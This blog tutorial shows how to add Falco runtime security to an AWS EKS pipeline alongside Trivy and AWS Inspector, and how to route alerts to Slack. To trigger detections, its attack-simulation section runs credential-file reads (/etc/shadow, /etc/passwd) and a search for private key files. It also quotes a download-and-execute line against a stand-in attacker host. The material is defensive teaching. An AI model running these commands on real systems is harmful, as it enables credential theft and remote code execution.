Beyond Shift Left: Runtime Security with Falco on AWS EKS

"Cloud security Engineer ☁️ | Writing about security & cloud topics ✍️ | Let's connect and dive into the exciting world of security and the cloud! ✨"

The whole concept of "Shift Left" revolves around proactive scrutiny: catching issues before they ever reach the environment where real users are. This spans everything from performance and reliability to security. The goal is simple: by the time code hits production, you've already stress-tested it against every failure scenario you can think of.

But for this article, we're narrowing the lens. Because here's what nobody tells you about shifting left from a security perspective: it only covers what you can see before deployment. And production has a way of introducing things you never accounted for.

"Beyond Shift Left" is about what happens after, continuously staying alert to issues that emerge while your workloads are already running and in the environment that actually matters. It's the acknowledgment that security doesn't end when the pipeline goes green. If anything, that's where a whole new category of risk begins, and that is where we get the concept of Runtime Security.

The Experience

It was one of those moments where everything looked fine, until it didn't.

We had Trivy set up in our CI/CD pipeline for our containers running on AWS ECS and EKS. Scans were passing. The .trivyignore file was handling the noisy packages we had consciously decided to suppress. The pipeline was green, the team was confident, and we shipped. For a while, that felt like enough.

A few weeks later, during an audit evaluation, someone opened AWS Inspector, and the room went quiet. We found many CVEs in the same containers we had already scanned and cleared. The first instinct was familiar: triage, fix, rebuild, get the numbers down. So we did. But somewhere in the middle of that cycle (the multiple team meetings, the version bumps, the cross-team coordination), a question started forming that wasn't going away.

We fixed what the scanners showed us. What about what they couldn't show us? What exactly is running inside these containers?

What is Falco?

With these questions in mind, we decided to implement Falco for runtime security. Falco is a cloud-native runtime security tool and a graduated project of the Cloud Native Computing Foundation (CNCF).

It works at the kernel level using eBPF to watch every syscall your containers make, every process spawned, every file accessed, every network connection opened. It then matches that behaviour against a set of rules and fires an alert the moment something looks wrong.
It doesn't patch vulnerabilities. It doesn't prevent deployments. What it does is make the invisible visible, and in security, visibility is everything.

Now let's get into the demo. We'll walk through a real setup on AWS EKS, show Trivy and Inspector giving the all-clear, and then watch Falco catch what neither of them could.

The Demo

Prerequisite

Install the needed software, clone the repo here, and check the README file. You should have these versions installed.

  1. Provision the EKS cluster — Terraform setup.
    Run the Terraform commands (within the terraform-conf folder) needed to initialize the EKS cluster.

    The "terraform-conf" folder sets up the required infrastructure: a VPC, subnets, a NAT gateway, the EKS control plane, a managed node group, and OIDC trust between AWS and GitHub, so the pipeline can authenticate to AWS without storing any long-lived keys in GitHub secrets.

    That is all the infrastructure your cluster needs to run. You should see confirmation of this after a successful provisioning run.

    Note: if you hit an "AMI not supported" error, check the currently supported EKS versions and update the cluster_version variable accordingly.

  2. Enable AWS Inspector. Go to your AWS Console → search for Inspector → click Enable Inspector.

    Once inside:

    • Make sure Amazon EC2 scanning is enabled

    • Make sure Amazon ECR scanning is enabled

    • Go to Account Management → confirm your account is activated.

  3. Set up your GitHub repository to use the OIDC role created in step 1.
    - Go to your GitHub repo → Settings → Secrets and variables → Actions → New repository secret
    Add these three secrets, replacing each placeholder with the real value:

    Secret Name       Value
    AWS_ROLE_ARN      "<github_actions_role_arn>"
    AWS_REGION        "<your_aws_region>"
    ECR_REPOSITORY    "<your_ecr_repo_uri>"
  4. Run the pipeline
    The pipeline is triggered automatically on every push to main. It:
    a. Builds the Docker image from your Dockerfile
    b. Scans it with Trivy
    c. Pushes it to ECR only if the scan passes
    d. Takes the image from ECR and deploys it to EKS

  5. Monitor the pipeline for any errors and fix them.
    Here, AWS Inspector and Trivy flagged several Critical and High vulnerabilities.
    Notice that Inspector also flags vulnerabilities on the EC2 worker node itself, the underlying OS that Trivy never scanned at all.

    Once they are fixed, a successful run gives you a green pipeline and a running pod.
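For readers who prefer the command line, steps 1 to 4 can be sketched as a handful of shell functions. This is a minimal sketch under stated assumptions, not the repository's own tooling: the function names, the tfplan file name, and the AWS_REGION and CLUSTER_NAME variables are hypothetical, and the Trivy severity gate is one plausible way to express "push only if the scan passes". It assumes the terraform, aws, gh, and trivy CLIs are installed and authenticated.

```shell
#!/bin/sh
# Hypothetical helpers mirroring steps 1 to 4.
# Nothing runs until you call one of the functions.

# Step 1: provision the cluster from the terraform-conf folder.
provision_cluster() {
  (
    cd terraform-conf &&
    terraform init &&
    terraform plan -out=tfplan &&
    terraform apply tfplan
  ) || return 1
  # Point kubectl at the new cluster (both variables are placeholders).
  aws eks update-kubeconfig --region "$AWS_REGION" --name "$CLUSTER_NAME"
}

# Step 2: enable Inspector scanning for EC2 and ECR, then show the status.
enable_inspector() {
  aws inspector2 enable --resource-types EC2 ECR &&
  aws inspector2 batch-get-account-status
}

# Step 3: store the three repository secrets with the GitHub CLI.
# Arguments: role ARN, region, ECR repository URI.
set_pipeline_secrets() {
  gh secret set AWS_ROLE_ARN --body "$1" &&
  gh secret set AWS_REGION --body "$2" &&
  gh secret set ECR_REPOSITORY --body "$3"
}

# Step 4b: return a non-zero exit code when Trivy reports HIGH or CRITICAL
# findings, honouring the suppressions listed in .trivyignore.
scan_image() {
  trivy image --exit-code 1 --severity HIGH,CRITICAL \
    --ignorefile .trivyignore "$1"
}
```

A typical session would export AWS_REGION and CLUSTER_NAME, then call provision_cluster, enable_inspector, and set_pipeline_secrets with your three values. In a pipeline, a non-zero exit from scan_image is what blocks the push to ECR.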

At this point, we have been able to detect and address vulnerabilities both pre-deployment with Trivy and post-deployment with AWS Inspector.
But what happens next? What happens inside the container once it is already running? That is the question neither tool was designed to answer, and that is exactly where Falco comes in.

Setting Up Runtime Security with Falco on AWS EKS

Let's install Falco. Run these commands one at a time:

  1. Add the Falco Helm repository
    helm repo add falcosecurity https://falcosecurity.github.io/charts
    helm repo update

  2. Create a dedicated namespace for Falco
    kubectl create namespace falco

  3. Install Falco via Helm
    helm install falco falcosecurity/falco --namespace falco --set driver.kind=ebpf --set tty=true

  4. Verify Falco is running
    kubectl get pods -n falco
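
If you expect to repeat the install, the four steps can be wrapped in one re-runnable function. This is a sketch rather than the only way to do it: the function name install_falco and the 180-second timeout are assumptions, while the chart, namespace, and --set values are the ones used above. It swaps "helm install" for "helm upgrade --install" so that a second run upgrades instead of failing.

```shell
#!/bin/sh
# Hypothetical wrapper around the four steps above; safe to re-run.
install_falco() {
  helm repo add falcosecurity https://falcosecurity.github.io/charts &&
  helm repo update &&
  # "upgrade --install" installs on the first run and upgrades afterwards;
  # --create-namespace replaces the separate "kubectl create namespace" step.
  helm upgrade --install falco falcosecurity/falco \
    --namespace falco --create-namespace \
    --set driver.kind=ebpf --set tty=true &&
  # Block until every Falco pod reports Ready (or the timeout expires).
  kubectl wait pod -n falco -l app.kubernetes.io/name=falco \
    --for=condition=Ready --timeout=180s
}
```

Calling install_falco returns non-zero if any step fails, which makes it easy to use in a setup script. Falco typically runs one pod per node, so the wait covers the whole node group.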

Simulate the attack

Falco is running and watching. Now let's simulate the attack.

  1. Start watching Falco logs live:
    kubectl logs -n falco -l app.kubernetes.io/name=falco -f

  2. Open another terminal and exec into the running container
    kubectl exec -it <pod-name> -- /bin/sh

  3. Simulate the attacks by running some attack commands.
    a. Attack 1 — cat /etc/shadow
    This is the file that stores hashed user passwords on Linux systems. A web server like nginx has absolutely no business reading this file; it serves HTTP traffic, it doesn't need to know about system users or passwords.

    b. Attack 2 — cat /etc/passwd
    Similar to shadow but less sensitive, it stores basic user account information. Still suspicious when a web server reads it. Attackers use it to map out what users exist on the system before escalating privileges.

    c. Attack 3 — curl http://example.com
    This simulates a container making an unexpected outbound connection. nginx receives incoming traffic; it doesn't initiate outbound connections to external domains.
    In a real attack, this would be curl http://attacker-server.com/malware.sh | sh which downloads and executes a malicious script. Falco sees the unexpected outbound connection and alerts regardless of the destination.

    d. Attack 4 — find / -name "*.key" 2>/dev/null
    This searches the entire filesystem for private key files: SSH keys, TLS certificates, and API keys. A classic attacker move after getting into a container is to hunt for credentials that can be used to access other systems or services. The 2>/dev/null part suppresses error messages to keep the search quiet.
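
To repeat the simulation without typing each command into an interactive shell, the four attacks can be replayed non-interactively. This is a sketch: the function name simulate_attacks is hypothetical, and it assumes the pod runs in the current namespace and has /bin/sh available. Command output is discarded because only the syscalls matter to Falco.

```shell
#!/bin/sh
# Hypothetical helper: replays the four demo attacks inside a pod.
# Usage: simulate_attacks <pod-name>
simulate_attacks() {
  pod="$1"
  # Each entry mirrors one of the attacks described above.
  for attack in \
    'cat /etc/shadow' \
    'cat /etc/passwd' \
    'curl http://example.com' \
    'find / -name "*.key" 2>/dev/null'
  do
    echo "--- $attack"
    # Discard the output, and do not stop if one command fails
    # (for example when curl is not installed in the image).
    kubectl exec "$pod" -- /bin/sh -c "$attack" >/dev/null 2>&1 || true
  done
}
```

Run it in one terminal while the Falco log stream from step 1 is open in another.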

The side-by-side terminal screenshot shows Falco reporting the events in real time. Here is what the fields in the /etc/shadow alert tell us:

process=cat: a legitimate Linux tool, no malware, no exploit. Just "cat" being used to do something it has no business doing inside a web server.

command=cat /etc/shadow: the exact command the attacker ran. No guesswork, no inference. Falco saw it at the kernel level.

user=root user_uid=0: the container is running as root. This is a separate concern worth fixing; a non-root container limits what an attacker can do even after getting in.

container_image_repository: exactly which image triggered this alert, traceable back to your ECR repository.

k8s_pod_name: exactly which pod, so you know what to kill or isolate immediately.

k8s_ns_name=default: which namespace, useful when you're running multiple workloads across namespaces.

Notice that Falco only alerted on the /etc/shadow read and not all of the attack commands we ran. That is because we are working with Falco's default rules, which cover the most well-known attack patterns out of the box.
For your specific workload, you can write custom rules that target the exact behaviours that should never happen in your containers.
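
As an illustration, two of the commands that went unnoticed could be covered with custom rules along these lines. Treat this as a sketch under assumptions: the rule names, file names, and priorities are hypothetical, and the conditions rely on the spawned_process and container macros from Falco's default ruleset being loaded before the custom file. The /etc/passwd read is left out on purpose, since many legitimate programs read that file and a naive rule would be noisy.

```shell
#!/bin/sh
# Writes a Helm values file carrying two hypothetical custom Falco rules.
cat > falco-custom-rules.yaml <<'EOF'
customRules:
  nginx-demo-rules.yaml: |-
    - rule: Download Tool Launched in Container
      desc: curl or wget was started inside a container.
      condition: spawned_process and container and proc.name in (curl, wget)
      output: >
        Download tool launched in container
        (command=%proc.cmdline user=%user.name
        image=%container.image.repository
        pod=%k8s.pod.name ns=%k8s.ns.name)
      priority: WARNING
      tags: [demo, network]

    - rule: Private Key Search in Container
      desc: find was used to look for key or certificate files.
      condition: >
        spawned_process and container and proc.name = find
        and (proc.args contains ".key" or proc.args contains ".pem")
      output: >
        Key file search in container
        (command=%proc.cmdline user=%user.name
        image=%container.image.repository
        pod=%k8s.pod.name ns=%k8s.ns.name)
      priority: WARNING
      tags: [demo, credentials]
EOF

echo "Wrote falco-custom-rules.yaml"
# Apply with (not run here):
#   helm upgrade falco falcosecurity/falco --namespace falco \
#     --reuse-values -f falco-custom-rules.yaml
```

Both rules match on the process that was spawned rather than on the network connection or file access itself, which keeps the conditions short. A stricter version would scope them to your own image with container.image.repository.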

"Falco didn't stop the attacker. But it made sure we knew about it in seconds instead of weeks."

Falco Sidekick

We can route Falco alerts into our existing workflows (Slack, CloudWatch, PagerDuty, and others) using Falco Sidekick.

Let's set up Falco Sidekick with Slack.

  • Go to slack.com → Create a new workspace → follow the prompts.

  • Now, create the incoming webhook by going to api.slack.com/apps

  • Click Create New App → From Scratch

  • Name it Falco Alerts → select your new workspace → Create App

  • On the left sidebar, click Incoming Webhooks

  • Toggle Activate Incoming Webhooks to On

  • Click Add New Webhook to Workspace

  • Select the channel - create a new channel called #falco-alerts and click Allow

  • Copy the webhook URL that appears below.

  • Upgrade your Falco Helm installation with Sidekick enabled:
    helm upgrade falco falcosecurity/falco --namespace falco --set driver.kind=ebpf --set tty=true --set falcosidekick.enabled=true --set falcosidekick.webui.enabled=true --set falcosidekick.config.slack.webhookurl='https://hooks.slack.com/services/your/webhook/url' --set falcosidekick.config.slack.minimumpriority=warning

  • Now, try running the attack command again, and you should see the Slack alerts.
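
The long chain of --set flags can also be kept in a values file, which is easier to review and keeps the webhook URL off the command line. The sketch below mirrors the flags from the upgrade command one for one; the function name write_sidekick_values and the file name falco-sidekick-values.yaml are assumptions.

```shell
#!/bin/sh
# Hypothetical helper: writes the Sidekick settings to a Helm values file.
# Usage: write_sidekick_values <slack-webhook-url>
write_sidekick_values() {
  webhook_url="$1"
  cat > falco-sidekick-values.yaml <<EOF
driver:
  kind: ebpf
tty: true
falcosidekick:
  enabled: true
  webui:
    enabled: true
  config:
    slack:
      webhookurl: "${webhook_url}"
      minimumpriority: "warning"
EOF
  # The file now contains a secret, so restrict it to the current user.
  chmod 600 falco-sidekick-values.yaml
}
```

After calling the function with your webhook URL, apply the file with helm upgrade falco falcosecurity/falco --namespace falco -f falco-sidekick-values.yaml, and keep it out of version control.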

With all of these in place, detection is only the beginning. When Falco fires an alert, your response options can include killing the pod immediately and letting Kubernetes spin up a clean replacement, isolating it with a Network Policy while you investigate, updating your manifest to run as non-root, or making the filesystem read-only if nginx only needs to serve static files.
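
The two hardening options at the end of that list could look like the patch below. It is a starting point under assumptions, not a drop-in fix: the container name nginx and the file name hardening-patch.yaml are hypothetical, runAsNonRoot only works with an image built to run as a non-root user, and a read-only root filesystem usually means nginx needs writable volumes for its cache and PID file.

```shell
#!/bin/sh
# Writes a strategic merge patch that hardens a container named "nginx"
# (the container name is an assumption; match it to your manifest).
cat > hardening-patch.yaml <<'EOF'
spec:
  template:
    spec:
      containers:
        - name: nginx
          securityContext:
            runAsNonRoot: true
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities:
              drop: ["ALL"]
EOF

echo "Wrote hardening-patch.yaml"
# Apply with (not run here):
#   kubectl patch deployment <deployment-name> --patch-file hardening-patch.yaml
```

With these settings, the cat /etc/shadow attack would fail with a permission error, because a non-root user cannot read that file. Falco can still report the attempt.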

The right response depends on the severity, but the key point is that you now have the information to respond at all.
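
For the isolation option, one common pattern is a deny-all Network Policy that applies only to pods carrying a quarantine label. The sketch below assumes the default namespace seen in the alert; the policy name, label, and function name are hypothetical. It only has an effect if the cluster's CNI enforces network policies, which on EKS has to be enabled explicitly.

```shell
#!/bin/sh
# Writes a NetworkPolicy that blocks all traffic to and from labelled pods.
cat > quarantine-policy.yaml <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: quarantine
  namespace: default
spec:
  podSelector:
    matchLabels:
      quarantine: "true"
  # Both directions are listed and no allow rules are given,
  # so all ingress and egress is denied for the selected pods.
  policyTypes:
    - Ingress
    - Egress
EOF

# Hypothetical helper: applies the policy and labels the suspicious pod.
# Usage: quarantine_pod <pod-name>
quarantine_pod() {
  kubectl apply -f quarantine-policy.yaml &&
  kubectl label pod "$1" quarantine=true --overwrite
}
```

Isolation keeps the pod alive for investigation. Once you have what you need, kubectl delete pod removes it and lets the Deployment schedule a clean replacement.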

Conclusion

A clean image is not a safe container.
Trivy answers: What vulnerable software is present in this image right now?
AWS Inspector answers: What has emerged since deployment?
Falco answers: What is this container actually doing at this very moment?

These are three different questions, and you need all three answers to have a complete picture of your security posture.

Shifting left was the right instinct. But security does not end when the pipeline goes green. It does not end when Inspector gives you a clean report. It continues for as long as your workloads are running, and that is exactly where runtime security lives.

You are not just shifting left anymore. You are going beyond it.